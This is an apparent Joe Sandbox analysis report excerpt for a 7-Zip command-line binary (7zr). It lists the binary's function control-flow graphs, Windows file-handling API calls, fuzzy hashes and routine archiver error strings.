                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ExceptionThrow
                        • String ID: Duplicate archive path:
                        • API String ID: 2366012087-4000988232
                        • Opcode ID: 221bb72e16b1fde8c75e914213379b354266e16d801933e61bd69472002e2afb
                        • Instruction ID: 70185088f4b66e3aaa6514b19096afda9c4cc396ade351abdd12be4ae63e109c
                        • Opcode Fuzzy Hash: 221bb72e16b1fde8c75e914213379b354266e16d801933e61bd69472002e2afb
                        • Instruction Fuzzy Hash: 3B817D31D00259DFCF16EFA4D991ADEB7B5EF09310F1041AAE5167B2A2DB30AE05CB60

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1563 386c72-386c8e call 41fb10 1566 386c90-386c94 1563->1566 1567 386c96-386c9e 1563->1567 1566->1567 1568 386cd3-386cdc call 388664 1566->1568 1569 386ca0-386ca4 1567->1569 1570 386ca6-386cae 1567->1570 1576 386ce2-386d02 call 3867f0 call 382f88 call 3887df 1568->1576 1577 386d87-386d92 call 3888c6 1568->1577 1569->1568 1569->1570 1570->1568 1571 386cb0-386cb5 1570->1571 1571->1568 1573 386cb7-386cce call 3867f0 call 382f88 1571->1573 1589 38715d-38715f 1573->1589 1600 386d4a-386d61 call 387b41 1576->1600 1601 386d04-386d09 1576->1601 1584 386d98-386d9e 1577->1584 1585 386f4c-386f62 call 3887fa 1577->1585 1584->1585 1588 386da4-386dc7 call 382e47 * 2 1584->1588 1597 386f64-386f66 1585->1597 1598 386f67-386f74 call 3885e2 1585->1598 1610 386dc9-386dcf 1588->1610 1611 386dd4-386dda 1588->1611 1592 387118-387126 1589->1592 1597->1598 1612 386fd1-386fd8 1598->1612 1613 386f76-386f7c 1598->1613 1615 386d63-386d65 1600->1615 1616 386d67-386d6b 1600->1616 1601->1600 1604 386d0b-386d38 call 389252 1601->1604 1604->1600 1623 386d3a-386d45 1604->1623 1610->1611 1617 386ddc-386def call 382407 1611->1617 1618 386df1-386df9 call 383221 1611->1618 1619 386fda-386fde 1612->1619 1620 386fe4-386feb 1612->1620 1613->1612 1621 386f7e-386f8a call 386bf5 1613->1621 1624 386d7a-386d82 call 38764c 1615->1624 1625 386d78 1616->1625 1626 386d6d-386d75 1616->1626 1617->1618 1638 386dfe-386e0b call 3887df 1617->1638 1618->1638 1619->1620 1629 3870e5-3870ea call 386868 1619->1629 1630 38701d-387024 call 388782 1620->1630 1631 386fed-386ff7 call 386bf5 1620->1631 1621->1629 1641 386f90-386f93 1621->1641 1623->1589 1651 387116 1624->1651 1625->1624 1626->1625 1643 3870ef-3870f3 1629->1643 1630->1629 1648 38702a-387035 1630->1648 1631->1629 1646 386ffd-387000 1631->1646 1652 386e0d-386e10 1638->1652 1653 386e43-386e50 call 386c72 1638->1653 1641->1629 1647 386f99-386fb6 call 3867f0 call 382f88 1641->1647 1649 38710c 1643->1649 1650 3870f5-3870f7 1643->1650 1646->1629 1654 387006-38701b call 3867f0 1646->1654 1683 386fb8-386fbd 1647->1683 1684 386fc2-386fc5 call 38717b 1647->1684 1648->1629 1656 38703b-387044 call 388578 1648->1656 1658 38710e-387111 call 386848 1649->1658 1650->1649 1657 3870f9-387102 1650->1657 1651->1592 1660 386e1e-386e36 call 3867f0 1652->1660 1661 386e12-386e15 1652->1661 1678 386f3a-386f4b call 381e40 * 2 1653->1678 1679 386e56 1653->1679 1674 386fca-386fcc 1654->1674 1656->1629 1677 38704a-387054 call 38717b 1656->1677 1657->1649 1666 387104-387107 call 38717b 1657->1666 1658->1651 1681 386e58-386e7e call 382f1c call 382e04 1660->1681 1682 386e38-386e41 call 382fec 1660->1682 1661->1653 1667 386e17-386e1c 1661->1667 1666->1649 1667->1653 1667->1660 1674->1658 1691 387064-387097 call 382e47 call 381089 * 2 call 386868 1677->1691 1692 387056-38705f call 382f88 1677->1692 1678->1585 1679->1681 1701 386e83-386e99 call 386bb5 1681->1701 1682->1681 1683->1684 1684->1674 1725 387099-3870af wcscmp 1691->1725 1726 3870bf-3870cc call 386bf5 1691->1726 1703 387155-387158 call 386848 1692->1703 1709 386e9b-386e9f 1701->1709 1710 386ecf-386ed1 1701->1710 1703->1589 1713 386ea1-386eae call 3822bf 1709->1713 1714 386ec7-386ec9 SetLastError 1709->1714 1712 386f09-386f35 call 381e40 * 2 call 386848 call 381e40 * 2 1710->1712 1712->1651 1723 386eb0-386ec5 call 381e40 call 382e04 1713->1723 1724 386ed3-386ed9 1713->1724 1714->1710 1723->1701 1728 386edb-386ee0 1724->1728 1729 386eec-386f07 call 3831e5 1724->1729 1732 3870bb 1725->1732 1733 3870b1-3870b6 1725->1733 1740 387129-387133 call 3867f0 1726->1740 1741 3870ce-3870d1 1726->1741 1728->1729 1735 386ee2-386ee8 1728->1735 1729->1712 1732->1726 1739 387147-387154 call 382f88 call 381e40 1733->1739 1735->1729 1739->1703 1758 38713a 1740->1758 1759 387135-387138 1740->1759 1746 3870d8-3870e4 call 381e40 1741->1746 1747 3870d3-3870d6 1741->1747 1746->1629 1747->1740 1747->1746 1762 387141-387144 1758->1762 1759->1762 1762->1739
                        APIs
                        • __EH_prolog.LIBCMT ref: 00386C77
                        • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00386EC9
                          • Part of subcall function 00386C72: wcscmp.MSVCRT ref: 003870A5
                          • Part of subcall function 00386BF5: __EH_prolog.LIBCMT ref: 00386BFA
                          • Part of subcall function 00386BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00386C1A
                          • Part of subcall function 00386BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00386C49
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                        • String ID: :$DATA
                        • API String ID: 3316598575-2587938151
                        • Opcode ID: 40f6f7e3b657e3dad24cf5448c6f61ad7febe5cb5f8a1a4f071d35f0ef318c6f
                        • Instruction ID: dfe137d8ed80ab71f11bc63cdbfd67b37c6e133c90bf17a8908a7b4ed39af57b
                        • Opcode Fuzzy Hash: 40f6f7e3b657e3dad24cf5448c6f61ad7febe5cb5f8a1a4f071d35f0ef318c6f
                        • Instruction Fuzzy Hash: 39E117709003099BCF23FFA4C896BEEB7B6AF14314F104599E8456F2D2DB70AA49C751
                        APIs
                        • __EH_prolog.LIBCMT ref: 00396FCA
                          • Part of subcall function 00396E71: __EH_prolog.LIBCMT ref: 00396E76
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
                        • API String ID: 3519838083-394804653
                        • Opcode ID: b60778b91c65314f37b66f2a6eb6caef51f649999333d93baa44f340a267b8c8
                        • Instruction ID: d2e1602bf94a8b245b28812dd6f92006f588bdcad07aefb5269baa43f65b2548
                        • Opcode Fuzzy Hash: b60778b91c65314f37b66f2a6eb6caef51f649999333d93baa44f340a267b8c8
                        • Instruction Fuzzy Hash: 9541D772E19244DBCF22DFA88451AEEFBF5BF45300F5544AED086A7241C6306E45C765
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$H_prolog
                        • String ID: =
                        • API String ID: 2614055831-2525689732
                        • Opcode ID: 66d89efadb4876b45df6d325db0cfc9cd796a5bad025f981daeade79a805b909
                        • Instruction ID: 2607d86e562a93e41b34f76bbcc486f8f3d826223e1614d45d33b9f9f2cbd2d9
                        • Opcode Fuzzy Hash: 66d89efadb4876b45df6d325db0cfc9cd796a5bad025f981daeade79a805b909
                        • Instruction Fuzzy Hash: 72219032A04218EBCF16FB94E942BEEBBB9EF48314F20006BE50176191DF756E45DB94
                        APIs
                        • __EH_prolog.LIBCMT ref: 003CBDBA
                          • Part of subcall function 003CBE69: __EH_prolog.LIBCMT ref: 003CBE6E
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: B$0B$DB
                        • API String ID: 3519838083-3705363898
                        • Opcode ID: 65460b8c5793d0f435f4bee1398d0f6d84368c7096f43c573139212d4b81e051
                        • Instruction ID: 7b69544e2ed3c24721ce196fbccfff142d3a04794374276a1c6022ea9e8c9cbc
                        • Opcode Fuzzy Hash: 65460b8c5793d0f435f4bee1398d0f6d84368c7096f43c573139212d4b81e051
                        • Instruction Fuzzy Hash: B711E9B0501754CFC321DF56D584A96FBE4BB18304F54C86FD0AA87712C7B4A948CB54
                        APIs
                        • __EH_prolog.LIBCMT ref: 003B8346
                        • fputs.MSVCRT ref: 003B835B
                        • fputs.MSVCRT ref: 003B8364
                          • Part of subcall function 003B83BF: __EH_prolog.LIBCMT ref: 003B83C4
                          • Part of subcall function 003B83BF: fputs.MSVCRT ref: 003B8401
                          • Part of subcall function 003B83BF: fputs.MSVCRT ref: 003B8437
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$H_prolog
                        • String ID: =
                        • API String ID: 2614055831-2525689732
                        • Opcode ID: 9bd3c12e5d5e41b73ccd959a7e04b96bbb77478e54158a0252ab6c722530da90
                        • Instruction ID: 3b22e53b74acc530ee249504203a5c33ba6a13cbcf39e306c3a3c47352605078
                        • Opcode Fuzzy Hash: 9bd3c12e5d5e41b73ccd959a7e04b96bbb77478e54158a0252ab6c722530da90
                        • Instruction Fuzzy Hash: 9D012635B00104EBCB03BBA4D812AEEBB79EF84704F00401AF505561A1CF785A46DFD5
                        APIs
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,0039AB57), ref: 00417DAA
                        • GetLastError.KERNEL32(?,00000000,0039AB57), ref: 00417DBB
                        • CloseHandle.KERNELBASE(00000000,?,00000000,0039AB57), ref: 00417DCF
                        • GetLastError.KERNEL32(?,00000000,0039AB57), ref: 00417DD9
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ErrorLast$CloseHandleObjectSingleWait
                        • String ID:
                        • API String ID: 1796208289-0
                        • Opcode ID: e2b09329811069239874746ea37dcdc804c76cecbaab48bc3c03d4c32742af43
                        • Instruction ID: 32eab559639d4a1a0c50a177afa8caaec5564cbe401b59f1db447ea38212b3c2
                        • Opcode Fuzzy Hash: e2b09329811069239874746ea37dcdc804c76cecbaab48bc3c03d4c32742af43
                        • Instruction Fuzzy Hash: 21F0F47130820547D7305ABDBC84FF766B89F55374720073BE561D22D0DE68DC818659
                        APIs
                        • EnterCriticalSection.KERNEL32(00442938), ref: 003B588B
                        • LeaveCriticalSection.KERNEL32(00442938), ref: 003B58BC
                          • Part of subcall function 003BC911: GetTickCount.KERNEL32 ref: 003BC926
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CriticalSection$CountEnterLeaveTick
                        • String ID: v$8)D
                        • API String ID: 1056156058-2099984107
                        • Opcode ID: 730ac79e80e569e4609a52fd5c522797d918252188e0106c7e1f8c4444663455
                        • Instruction ID: fcdab92dd55b11ab5c7a049db9f333a1a4ea509b256dac1da95fa8ff769f68b6
                        • Opcode Fuzzy Hash: 730ac79e80e569e4609a52fd5c522797d918252188e0106c7e1f8c4444663455
                        • Instruction Fuzzy Hash: 3CE065B5605210EFC315EF18D948E8A37E5AF98311F02047EF6098B362CB308C49CAA9
                        APIs
                        • __EH_prolog.LIBCMT ref: 003A209B
                          • Part of subcall function 0038757D: GetLastError.KERNEL32(0038D14C), ref: 0038757D
                          • Part of subcall function 003A2C6C: __EH_prolog.LIBCMT ref: 003A2C71
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ErrorLastfree
                        • String ID: Cannot find archive file$The item is a directory
                        • API String ID: 683690243-1569138187
                        • Opcode ID: 598838ce465af6276c4c772e1986c39f8f2c82ce7a129db804061d8dbcac0dcd
                        • Instruction ID: 45f174e1230b494df451cd6e013d55ef209df79dd0fc0dfb64581d63de46801c
                        • Opcode Fuzzy Hash: 598838ce465af6276c4c772e1986c39f8f2c82ce7a129db804061d8dbcac0dcd
                        • Instruction Fuzzy Hash: 2E722770D00258DFCB26DF68C984BDEBBB5EF5A300F15409AE859AB252C774AE81CF51
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CountTickfputs
                        • String ID: .
                        • API String ID: 290905099-4150638102
                        • Opcode ID: 34798e15adb6844bd037f3d9ca24fce4211441c34f0bdf78cbf05b9e0b4e6b48
                        • Instruction ID: bd5431a71f5d311c50daf14e20f77dfcfb8499f339ada1d4340a739eb8f2037e
                        • Opcode Fuzzy Hash: 34798e15adb6844bd037f3d9ca24fce4211441c34f0bdf78cbf05b9e0b4e6b48
                        • Instruction Fuzzy Hash: 33716830620B049FDB32EF64C491AAEB7F6BF81708F01585DE6878BA41DB70B945CB11
                        APIs
                          • Part of subcall function 00389C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00389CB3
                          • Part of subcall function 00389C8F: GetProcAddress.KERNEL32(00000000), ref: 00389CBA
                          • Part of subcall function 00389C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00389CC8
                        • __aulldiv.LIBCMT ref: 003C093F
                        • __aulldiv.LIBCMT ref: 003C094B
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                        • String ID: 3333
                        • API String ID: 3520896023-2924271548
                        • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                        • Instruction ID: b3dea3985e34eecac80e4f83f48c6aa30111137a695cdeb42b798a0baca0e1ca
                        • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                        • Instruction Fuzzy Hash: 2C21D8B0A00744AEE7349F6A8881B5BBAFDEB84710F00892FA18AD3242D7709D448755
                        APIs
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        • memset.MSVCRT ref: 003AAEBA
                        • memset.MSVCRT ref: 003AAECD
                          • Part of subcall function 003C04D2: _CxxThrowException.MSVCRT(?,00434A58), ref: 003C04F8
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: memset$ExceptionThrowfree
                        • String ID: Split
                        • API String ID: 1404239998-1882502421
                        • Opcode ID: 29124b6bb421a19145db7f074853f69ec1d10690c7c501e5c694e0c921f593cf
                        • Instruction ID: d1e559e46b5e68ba41d7e2abda81d61b1b1b1b9767a93c20e2e029de15e91a91
                        • Opcode Fuzzy Hash: 29124b6bb421a19145db7f074853f69ec1d10690c7c501e5c694e0c921f593cf
                        • Instruction Fuzzy Hash: F8425B31A04648DFDF26DFA4C994BADBBB5FF06304F1440A9E449AB251CB35AE85CF12
                        APIs
                        • __EH_prolog.LIBCMT ref: 0038759F
                          • Part of subcall function 0038764C: CloseHandle.KERNELBASE(00000000,?,003875AF,00000002,?,00000000,00000000), ref: 00387657
                        • CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 003875E5
                        • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 00387626
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CreateFile$CloseH_prologHandle
                        • String ID:
                        • API String ID: 449569272-0
                        • Opcode ID: 0eee0d261d031824c692979c472633ecf6bde93eef7985d5a9382c2d1355361d
                        • Instruction ID: bffe6259634dac28be882ef6d1ffcf16fa6785cf4affc7e8afb4c47be20cd0c5
                        • Opcode Fuzzy Hash: 0eee0d261d031824c692979c472633ecf6bde93eef7985d5a9382c2d1355361d
                        • Instruction Fuzzy Hash: 9511B17280020AEFCF12AFA4DC408EEBB7AFF54354B108569F860561A1C7359E61EB50
                        APIs
                        • fputs.MSVCRT ref: 003B8437
                        • fputs.MSVCRT ref: 003B8401
                          • Part of subcall function 00381FB3: __EH_prolog.LIBCMT ref: 00381FB8
                        • __EH_prolog.LIBCMT ref: 003B83C4
                          • Part of subcall function 00381FA0: fputc.MSVCRT ref: 00381FA7
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prologfputs$fputc
                        • String ID:
                        • API String ID: 678540050-0
                        • Opcode ID: aa58dacb12c5f9c12474e52e360d2c8c12267a4e6cfe08e6a1171098597b5c79
                        • Instruction ID: b3a5af47feda92d6d9d65672c64bc7e9d180bb77e82822fc1cafe6fdf73ff0ff
                        • Opcode Fuzzy Hash: aa58dacb12c5f9c12474e52e360d2c8c12267a4e6cfe08e6a1171098597b5c79
                        • Instruction Fuzzy Hash: 7A11E931B042159BCF07B7A1E8136AFBB7DDF44B54F50006AF6019B691CF691946CBD8
                        APIs
                        • SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,003877DB,?,?,00000000,?,00387832,?), ref: 00387773
                        • GetLastError.KERNEL32(?,003877DB,?,?,00000000,?,00387832,?,?,?,?,00000000), ref: 00387780
                        • SetLastError.KERNEL32(00000000,?,?,003877DB,?,?,00000000,?,00387832,?,?,?,?,00000000), ref: 00387797
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ErrorLast$FilePointer
                        • String ID:
                        • API String ID: 1156039329-0
                        • Opcode ID: 86f3cc9785c87983dcf605e99b84537a57429798888882ccf71b3a4296930b17
                        • Instruction ID: 459bbee272fe9973fd4609c86b026b4f814bbd3db86836322bae88877460561e
                        • Opcode Fuzzy Hash: 86f3cc9785c87983dcf605e99b84537a57429798888882ccf71b3a4296930b17
                        • Instruction Fuzzy Hash: BB11EC30204305AFEF229F68CC85BAE7BE6AF08360F208469F81697291D7B1DD10DB60
                        APIs
                        • __EH_prolog.LIBCMT ref: 00385A91
                        • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 00385AB7
                        • SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 00385AEC
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: AttributesFile$H_prolog
                        • String ID:
                        • API String ID: 3790360811-0
                        • Opcode ID: d5466aea3172bfc25959eb82ca6b68baf561b2425f73f4b1c7f5745a2efef9eb
                        • Instruction ID: e8a203f99cb3b599cecc0576df260fc486623fec7614df2fede35f328201a2f0
                        • Opcode Fuzzy Hash: d5466aea3172bfc25959eb82ca6b68baf561b2425f73f4b1c7f5745a2efef9eb
                        • Instruction Fuzzy Hash: BA01D232E04715ABCF17BBA4A8816BEB77AEF50350F1544AAEC11A7191CB394D06EB50
                        APIs
                        • __EH_prolog.LIBCMT ref: 00395BEF
                          • Part of subcall function 003954C0: __EH_prolog.LIBCMT ref: 003954C5
                          • Part of subcall function 00395630: __EH_prolog.LIBCMT ref: 00395635
                          • Part of subcall function 003A36EA: __EH_prolog.LIBCMT ref: 003A36EF
                          • Part of subcall function 003957C1: __EH_prolog.LIBCMT ref: 003957C6
                          • Part of subcall function 003958BE: __EH_prolog.LIBCMT ref: 003958C3
                        Strings
                        • Cannot seek to begin of file, xrefs: 0039610F
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: Cannot seek to begin of file
